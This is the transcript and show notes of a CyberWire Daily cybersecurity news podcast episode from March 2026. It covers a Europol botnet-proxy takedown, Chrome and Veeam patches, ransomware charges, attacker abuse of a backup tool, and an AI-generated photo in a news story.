Podcasts
CyberWire Daily
Ep 2508
The CyberWire Daily Podcast 3.13.26
Ep 2508 | 3.13.26

Socks pulled, patches pushed.

Show Notes
Transcript

Europol dismantles the SocksEscort proxy service. Cyber operations highlight imbalance in the war in Iran. Google rushes Chrome zero-day patches. Veeam fixes critical backup flaws. A former incident responder faces ransomware charges. Thomson Reuters staff push back on an ICE contract. Attackers abuse backup tools for data theft. CISA flags a critical n8n vulnerability. Maria Varmazis is joined by Jack R. Bialik, engineer and author, to discuss the hidden risks of a fully-digital society, and talk about his book "In Lost in Time: Our Forgotten and Vanishing Knowledge." A Phony photo fuels a phantom flight fiasco.

Today is Friday March 13th 2026. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Europol launches Operation Lightning to dismantle SocksEscort.

This week, Europol and international partners launched Operation Lightning to dismantle the criminal proxy service “SocksEscort.” Working with authorities from Austria, France, the Netherlands, the United States, and Eurojust, investigators seized 34 domains and 23 servers across seven countries and froze USD 3.5 million in cryptocurrency. The service relied on a botnet of more than 369,000 compromised routers and Internet of Things devices in 163 countries, primarily residential modems infected through exploited vulnerabilities. Customers paid for access to these hijacked IP addresses, allowing them to conceal their identities while conducting crimes such as ransomware attacks, distributed denial-of-service (DDoS) campaigns, and the distribution of child sexual abuse material. Europol supported the investigation with intelligence analysis, crypto tracing, and coordination, highlighting the importance of international cooperation in disrupting cybercrime infrastructure.

The war in Iran is marked by cyber imbalance. 

An analysis from the International Institute for Strategic Studies looks at the first week of the war between Israel, the United States, and Iran, highlighting a significant imbalance in cyber capabilities. Public reports describe Israeli and US cyber operations that supported military actions, including hacking Tehran’s traffic cameras to time a strike on Iranian leadership, disrupting telecommunications to hinder command-and-control, and briefly taking over a popular prayer app to spread anti-regime messages. Analysts note that these publicly known operations likely represent only a small portion of the broader cyber campaign, with many capabilities remaining undisclosed.

Israel and the US are expected to prioritize cyber operations for intelligence gathering and information operations, occasionally integrating them with kinetic strikes. Iran, by contrast, has relied heavily on proxy groups and hacktivists conducting distributed denial-of-service attacks, website defacements, and hack-and-leak campaigns. While disruptive, these activities are often more symbolic than strategic. Governments worldwide have warned organizations to strengthen defenses, as Iranian actors and proxies may target countries beyond Israel and the US.

Google issues emergency security updates for Chrome. 

Google has issued emergency security updates for Chrome to fix two high-severity vulnerabilities, CVE-2026-3909 and CVE-2026-3910, which are already being exploited in the wild. The first flaw involves an out-of-bounds write in the Skia graphics library that could allow attackers to crash the browser or execute code. The second affects the V8 JavaScript and WebAssembly engine. Google patched the issues within two days and released updates for Windows, macOS, and Linux in Chrome version 146.0.7680.75/76. Users are advised to update their browsers as rollout may take time.

Veeam patches multiple vulnerabilities in its Backup & Replication software. 

Veeam has patched multiple vulnerabilities in its Backup & Replication (VBR) software, including four critical remote code execution flaws. Three of the vulnerabilities allow low-privileged domain users to execute code on vulnerable backup servers, while another enables a Backup Viewer to gain code execution as the postgres user. Additional high-severity bugs could allow privilege escalation, SSH credential extraction, or manipulation of files on backup repositories. The issues were fixed in versions 12.3.2.4465 and 13.0.1.2067. Veeam urges administrators to update quickly, as backup servers are frequent ransomware targets and attackers often reverse-engineer patches to exploit unpatched systems.

Prosecutors say a former IR staffer exploited trusted access for a ransomware campaign. 

The U.S. Department of Justice has charged Angelo Martino, a former employee of an incident response firm, for allegedly participating in a ransomware extortion scheme linked to the BlackCat (ALPHV) group. Between April 2023 and April 2025, Martino reportedly acted as a direct affiliate, working with two other former cybersecurity professionals to exploit their trusted roles and demand ransom payments from victims. Prosecutors allege the group targeted at least 10 U.S. organizations across sectors including healthcare, finance, manufacturing, and retail, threatening to leak stolen data unless payments were made. In one case, a Tampa-based medical device manufacturer reportedly paid about $1.27 million in cryptocurrency. Investigators say the conspirators shared roughly 20% of ransom proceeds with BlackCat administrators. The case highlights the growing risk of insider threats within the cybersecurity and incident response industry.

Thomson Reuters employees urge company leadership not to renew a multi-million dollar contract with ICE. 

More than 200 Thomson Reuters employees are urging company leadership not to renew a $22.8 million contract with U.S. Immigration and Customs Enforcement (ICE) that provides investigative software capable of gathering public and private data and tracking license plates. The protest is concentrated among employees in Minnesota, where ICE operations under “Operation Metro Surge” directly affected local communities. Workers say arrests, intimidation, and violence linked to enforcement actions have made the issue personal, prompting concerns that the company’s tools could be used to identify or harass individuals. The internal push gained momentum after an online post listed companies working with ICE, sparking internal discussions and organizing among staff. Thomson Reuters said it supports investigations related to national security and public safety while maintaining safeguards to ensure lawful use of its products. Employee groups and some shareholders are calling for stronger human rights oversight.

Attackers use a renamed backup tool to steal data before a ransomware strike. 

Huntress SOC analysts investigated a ransomware incident in which attackers used the backup tool restic to stage and exfiltrate data before deploying INC ransomware. The threat actor accessed a compromised endpoint on 24 February 2026, mapped a network share, elevated privileges with PsExec, and created a scheduled task to execute a PowerShell script. The script configured AWS credentials and a Wasabi S3 repository, then ran a renamed copy of restic (winupdate.exe) to back up selected files for exfiltration. Limited visibility hindered early detection because the Huntress agent was not fully deployed and the victim lacked a SIEM system. On 25 February, the attacker removed security tools, disabled Windows Defender, and launched the ransomware. Analysts noted similar activity in an earlier February incident and referenced comparable findings reported by Cyber Centaurs, suggesting a repeatable attacker technique.

CISA tags a vulnerability in the n8n automation platform. 

CISA has added CVE-2025-68613, a critical remote code execution vulnerability in the open-source workflow automation platform n8n, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw allows authenticated attackers to execute arbitrary code with the same privileges as the n8n process, potentially leading to full system compromise. The vulnerability affects versions from 0.211.0 until patched releases 1.120.4, 1.121.1, and 1.122.0. Proof-of-concept exploits show attackers can abuse JavaScript expressions in workflows to run system commands. Federal agencies must patch the issue by March 25, 2026. Researchers previously identified over 100,000 potentially exposed instances, with tens of thousands still vulnerable earlier this year.

A Phony photo fuels a phantom flight fiasco. 

In early March, as Dutch travelers scrambled to leave the Gulf amid rising tensions, De Telegraaf published a hopeful story: a woman in Dubai, Tamara Harema, was reportedly organizing private evacuation flights home. Seats on a chartered Airbus A321 were said to cost €1,600, and demand was apparently brisk.

Bellingcat soon took a closer look, and things unraveled rather quickly. Harema’s photo showed several telltale signs of generative AI, including distorted objects and architectural details around Dubai’s Burj Khalifa that did not match reality. The supposed evacuation flight also proved elusive. Flight-tracking data showed no Airbus A321 departing Muscat for the Netherlands on the dates mentioned.

After Bellingcat raised questions, the newspaper quietly removed the image, noting it likely failed to meet journalistic standards. The interview remains online, leaving readers with a curious modern mystery: a humanitarian flight effort that may have existed mainly in pixels and good intentions.

 

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

Research Saturday plug. 

This week on Research Saturday, we’re joined by Or Eshed, Co-Founder and CEO of LayerX Security, to discuss their research uncovering a campaign of 16 malicious browser extensions disguised as ChatGPT productivity tools.

These extensions secretly capture ChatGPT session tokens, allowing attackers to hijack accounts and access conversations, files, and connected services like Google Drive or Slack.

And that’s the CyberWire Daily, brought to you by N2K CyberWire.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry.  Learn how at n2k.com.

N2K’s lead producer is Liz Stokes. We’re mixed by  Tré Hester, with original music by and sound design Elliott Peltzman. Our contributing host is Maria Varmazis. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I’m Dave Bittner. Thanks for listening.

CyberWire Daily
Podcast Info
HOST(S):
Dave Bittner
Dave Bittner is a security podcast host and one of the founders at CyberWire. He's a creator, producer, videographer, actor, experimenter, and entrepreneur. He's had a long career in the worlds of television, journalism and media production, and is one of the pioneers of non-linear editing and digital storytelling.
Schedule: Monday-Friday
Creator: N2K Networks, Inc.